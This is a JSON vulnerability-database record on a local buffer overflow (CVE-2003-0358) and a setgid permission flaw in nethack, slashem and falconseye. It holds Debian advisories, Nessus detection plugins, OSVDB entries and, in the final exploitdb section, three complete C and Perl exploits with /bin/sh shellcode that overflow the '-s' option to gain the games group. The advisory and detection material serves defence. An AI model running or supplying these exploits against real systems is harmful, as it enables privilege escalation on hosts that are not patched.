1596788 f6474b287da991a0426c83710862c249\n\nThese files will probably be moved into the stable distribution on its\nnext revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "id": "DEBIAN:DSA-316-2:B22FD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00108.html", "title": "[SECURITY] [DSA-316-2] New slashem packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 350-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJuly 15th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : falconseye\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358\n\nThe falconseye package is vulnerable to a buffer overflow exploited\nvia a long '-s' command line option. 
This vulnerability could be used\nby an attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.3-9.\n\nWe recommend that you update your falconseye package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3.dsc\n Size/MD5 checksum: 700 b11f92392768f7513c5d4f113faf113d\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3.diff.gz\n Size/MD5 checksum: 14939 70aeba2469a22234e1d6c659c47e848a\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3.orig.tar.gz\n Size/MD5 checksum: 8237462 1f5a837d76b64bf52cfe0033924fb37e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye-data_1.9.3-7woody3_all.deb\n Size/MD5 checksum: 4991316 520ff0f0be13cfa42baa65af97f0b55e\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_alpha.deb\n Size/MD5 checksum: 1149664 3ff9e27ffa544fd1e5e2e8ddde03e1d5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_arm.deb\n Size/MD5 checksum: 873900 1d50f9f972b15030de3923f9376a870b\n\n Intel IA-32 architecture:\n\n 
http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_i386.deb\n Size/MD5 checksum: 774438 f9df67fd1d58100b46aaf348d9678472\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_ia64.deb\n Size/MD5 checksum: 1381860 1a7d26c1962f3e222bd162b1d1f48359\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_hppa.deb\n Size/MD5 checksum: 1000060 7a106848005c7d98a4f85112dcfe4962\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_m68k.deb\n Size/MD5 checksum: 728580 dfe5e7296df28eebd191debcb081097c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_mips.deb\n Size/MD5 checksum: 935716 15224a235dc364839e9bd41dd86f21f5\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_mipsel.deb\n Size/MD5 checksum: 936784 c9b192045d43213a567a88eca6775dab\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_powerpc.deb\n Size/MD5 checksum: 881438 6e383fb41473e7433db1c88a05916c94\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_s390.deb\n Size/MD5 checksum: 854812 aa044dc021a572309b65c7d7ce821dca\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_sparc.deb\n Size/MD5 checksum: 894254 0aaa7b6c9f8918aab550ea5e4af07a49\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2003-07-15T00:00:00", "published": "2003-07-15T00:00:00", "id": "DEBIAN:DSA-350-1:7D62B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00147.html", "title": "[SECURITY] [DSA-350-1] New falconseye packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:16:48", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 11th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : nethack\nVulnerability : buffer overflow, incorrect permissions\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358 CAN-2003-0359\n\nThe nethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. 
This vulnerability could be used by an\nattacker to gain gid 'games' on a system where nethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 3.3.0-7potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 3.4.1-1.\n\nWe recommend that you update your nethack package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "id": "DEBIAN:DSA-316-1:48A9A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00107.html", "title": "[SECURITY] [DSA-316-1] New nethack packages fix buffer overflow, incorrect permissions", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:49:25", "description": "The falconseye package is vulnerable to a buffer overflow exploited\nvia a long -s command line option. 
This vulnerability could be used by\nan attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-350-1 : falconseye - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:falconseye"], "id": "DEBIAN_DSA-350.NASL", "href": "https://www.tenable.com/plugins/nessus/15187", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-350. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15187);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0358\");\n script_bugtraq_id(6806);\n script_xref(name:\"DSA\", value:\"350\");\n\n script_name(english:\"Debian DSA-350-1 : falconseye - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The falconseye package is vulnerable to a buffer overflow exploited\nvia a long -s command line option. 
This vulnerability could be used by\nan attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-350\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nWe recommend that you update your falconseye package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:falconseye\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, 
\"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"falconseye\", reference:\"1.9.3-7woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"falconseye-data\", reference:\"1.9.3-7woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:48:54", "description": "The nethack and slashem packages are vulnerable to a buffer overflow\nexploited via a long '-s' command line option. This vulnerability\ncould be used by an attacker to gain gid 'games' on a system where\nnethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-316-1 : nethack - buffer overflow, incorrect permissions", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:nethack", "cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-316.NASL", "href": "https://www.tenable.com/plugins/nessus/15153", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-316. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15153);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_bugtraq_id(6806, 7953);\n script_xref(name:\"DSA\", value:\"316\");\n\n script_name(english:\"Debian DSA-316-1 : nethack - buffer overflow, incorrect permissions\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nethack and slashem packages are vulnerable to a buffer overflow\nexploited via a long '-s' command line option. This vulnerability\ncould be used by an attacker to gain gid 'games' on a system where\nnethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-316\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 3.3.0-7potato1.\n\nWe recommend that you update your nethack package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 0.0.6E4F8-4.0woody3.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 
0.0.5E7-3potato1.\n\nWe recommend that you update your slashem package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nethack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"nethack\", reference:\"3.3.0-7potato1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-common\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", 
prefix:\"nethack-gnome\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-qt\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-x11\", reference:\"3.4.0-3.0woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0359"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-316)\nISS X-Force ID: 12362\n[CVE-2003-0359](https://vulners.com/cve/CVE-2003-0359)\nBugtraq ID: 7953\n", "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12021", "id": "OSVDB:12021", "type": "osvdb", "title": "nethack SGID Binary Installation Permission Weakness", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0358"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.nethack.org/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-316)\n[Related OSVDB ID: 12020](https://vulners.com/osvdb/OSVDB:12020)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-02/0117.html\nISS X-Force ID: 11283\n[CVE-2003-0358](https://vulners.com/cve/CVE-2003-0358)\nBugtraq ID: 6806\n", "modified": "2003-02-09T00:00:00", "published": "2003-02-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12019", "id": "OSVDB:12019", "type": "osvdb", "title": "nethack -s Option Local Overflow", "cvss": {"score": 4.6, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0358"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://falconseye.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-350)\n[Related OSVDB ID: 12019](https://vulners.com/osvdb/OSVDB:12019)\nISS X-Force ID: 12618\n[CVE-2003-0358](https://vulners.com/cve/CVE-2003-0358)\n", "modified": "2003-07-15T00:00:00", "published": "2003-07-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12020", "id": "OSVDB:12020", "type": "osvdb", "title": "Falcon's Eye falconseye -s Option Local Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T18:16:47", "description": "Nethack 3 Local Buffer Overflow Vulnerability (1). CVE-2003-0358. Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22233", "href": "https://www.exploit-db.com/exploits/22233/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n\r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n\r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. 
As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n\r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n/*\r\n tsao@efnet #!IC@efnet 2k3\r\n thnx to aleph1 for execve shellcode &\r\n davidicke for setreuid() shellcode\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n\r\n\r\nchar code[] =\r\n\r\n\"\\x29\\xc4\\x31\\xc0\\x31\\xc9\\x31\\xdb\\xb3\\x0c\\x89\\xd9\\xb0\\x46\\xcd\\x80\"\r\n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\n\r\nunsigned long sp(void) {\r\n __asm__(\"movl %esp,%eax\");\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n char *p;\r\n int i, off;\r\n\r\n p = malloc(sizeof(char) * atoi(argv[1]));\r\n memset(p,0x90,atoi(argv[1]));\r\n\r\n off = 220 - strlen(code);\r\n printf(\"shellcode at %d->%d\\n\",off,off+strlen(code));\r\n for(i=0;i<atoi(argv[1]);i++)\r\n p[i+off] = code[i];\r\n\r\n\r\n *(long *) &p[220] = sp() - atoi(argv[2]);\r\n printf(\"Using %x\\n\",sp() - atoi(argv[2]));\r\n\r\n execl(\"/usr/games/lib/nethackdir/nethack\",\"nethack\",\"-s\",p,0);\r\n perror(\"wtf\");\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22233/"}, {"lastseen": "2016-02-02T18:16:56", "description": "Nethack 3 Local Buffer Overflow Vulnerability (2). CVE-2003-0358. 
Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22234", "href": "https://www.exploit-db.com/exploits/22234/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n \r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n \r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n \r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n\r\n/* DSR-nethack.c by bob@dtors.net\r\n * Vulnerbility Found by tsao.\r\n *\r\n * Local BufferOverflow that leads\r\n * to elevated privileges [games].\r\n *\r\n * Basic PoC code...nothing special.\r\n *[bob@dtors bob]$ ./DSR-nethack\r\n *\r\n * DSR-nethack.c By bob.\r\n * Local Exploit for Nethack 3.4.0\r\n * DSR-[www.dtors.net]-DSR\r\n * \r\n * ret: 0xbffffd86\r\n *\r\n * Cannot find any current entries for \r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.\ufffd\ufffd\ufffd\r\n * Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]\r\n * Player types are: [-p role] [-r race]\r\n * sh-2.05b$ id -a\r\n * uid=12(games) gid=501(bob) groups=501(bob)\r\n * sh-2.05b$ \r\n *\r\n * www.dtors.net // www.b0f.net\r\n */\r\n#include <stdio.h>\r\nchar shellcode[]= /* shellcode by bob */\r\n \r\n\"\\x29\\xc4\\x31\\xc0\\x31\\xc9\\x31\\xdb\\xb3\\x0c\\x89\\xd9\\xb0\\x46\\xcd\\x80\" 
//minus\r\n\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\"\r\n\"\\xe3\\x8d\\x54\\x24\\x08\\x50\\x53\\x8d\\x0c\\x24\\xb0\\x0b\\xcd\\x80\";\r\nint main ()\r\n{\r\n unsigned long ret = 0xbffffd86; //Redhat 8.0 i386\r\n char buf[224]; \r\n char smeg[1024];\r\n char *ptr; \r\n int i=0; \r\nfprintf(stdout, \"\\n\\tDSR-nethack.c By bob.\\n\"); \r\nfprintf(stdout, \"Local Exploit for Nethack 3.4.0\\n\");\r\nfprintf(stdout, \"\\tDSR-[www.dtors.net]-DSR\\n\");\r\n \r\nmemset(buf, 0x41, sizeof(buf)); \r\n ptr = smeg; \r\n for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90; \r\n for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; \r\n smeg[1024 - 1] = '\\0'; //null byte\r\n memcpy(smeg,\"EGG=\",4); \r\n putenv(smeg);\r\n buf[220] = (ret & 0x000000ff); \r\n buf[221] = (ret & 0x0000ff00) >> 8;\r\n buf[222] = (ret & 0x00ff0000) >> 16;\r\n buf[223] = (ret & 0xff000000) >> 24;\r\n buf[224] = '\\0';\r\n \r\n fprintf(stdout,\"ret: 0x%08x\\n\",ret);\r\n \r\n execl(\"/usr/games/lib/nethackdir/nethack\", \"nethack\", \"-s\", buf, \r\nNULL); //weeoooweeeeooowooo\r\n return 0;\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22234/"}, {"lastseen": "2016-02-02T18:17:05", "description": "Nethack 3 Local Buffer Overflow Vulnerability (3). CVE-2003-0358. 
Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22235", "href": "https://www.exploit-db.com/exploits/22235/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n \r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n \r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n \r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# tsao@efnet #!IC@efnet 2k3\r\n# thnx to aleph1 for execve shellcode\r\n# davidicke for setreuid() shellcode\r\n\r\n\r\n$sc .= \"\\x31\\xdb\\x31\\xc9\\xbb\\xff\\xff\\xff\\xff\\xb1\\x0c\\x31\\xc0\\xb0\\x46\\xcd\\x80\\x31\\xdb\";\r\n$sc .= \"\\x31\\xc9\\xb3\\x0c\\xb1\\x0c\\x31\\xc0\\xb0\\x46\\xcd\\x80\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\";\r\n$sc .= \"\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\\x34\\x12\";\r\n$sc .= \"\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\\xff\\xff\\xff\\x2f\\x62\";\r\n$sc .= \"\\x69\\x6e\\x2f\\x73\\x68\\x01\";\r\n\r\nfor ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {\r\n $buf .= \"\\x90\";\r\n}\r\n\r\n$buf .= $sc;\r\n$buf .= \"\\xd2\\xf8\\xff\\xbf\";\r\n\r\nexec(\"/usr/games/lib/nethackdir/nethack -s '$buf'\");", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22235/"}]}